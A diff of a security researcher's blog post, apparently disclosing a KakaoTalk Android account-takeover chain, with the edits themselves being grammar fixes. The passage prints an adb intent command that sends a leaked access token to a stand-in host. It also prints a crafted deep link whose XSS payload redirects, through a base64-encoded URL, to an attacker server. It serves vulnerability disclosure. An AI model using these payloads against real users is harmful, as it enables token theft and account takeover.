stulle123/stulle123.github.io/content/posts/kakaotalk-account-takeover.md

 This included `javascript://` and `data://` schemes which allow to run JavaScript.
 Also, it supported `content://` URLs, so a URL such as `content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json` opens KakaoTalk's Firebase Installation configuration in the `MyProfileSettingsActivity` WebView.

-Last but not least, it leaked an access token in the `Authorization` HTTP header.
+Additionally, it leaked an access token in the `Authorization` HTTP header.
 For example, a command such as `adb shell am start "intent:#Intent\;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity\;S.EXTRA_URL=https://foo.bar\;end"` would send the token to `https://foo.bar`.

 What could we do with this token?
-Maybe taking over a victim's KakaoTalk account?
+Maybe take over a victim's KakaoTalk account?

 ## Deep Link to Kakao Mail Account Takeover

 As explained in the previous section the `MyProfileSettingsActivity` is not exported, but we could start it via `CommerceBuyActivity` with the trick explained above.
-By crafting a malicious deep link we could send the access token to an attacker-controlled server:
+By crafting a malicious deep link, we could send the access token to an attacker-controlled server:

 ```
 kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUvZm9vLmh0bWw=');">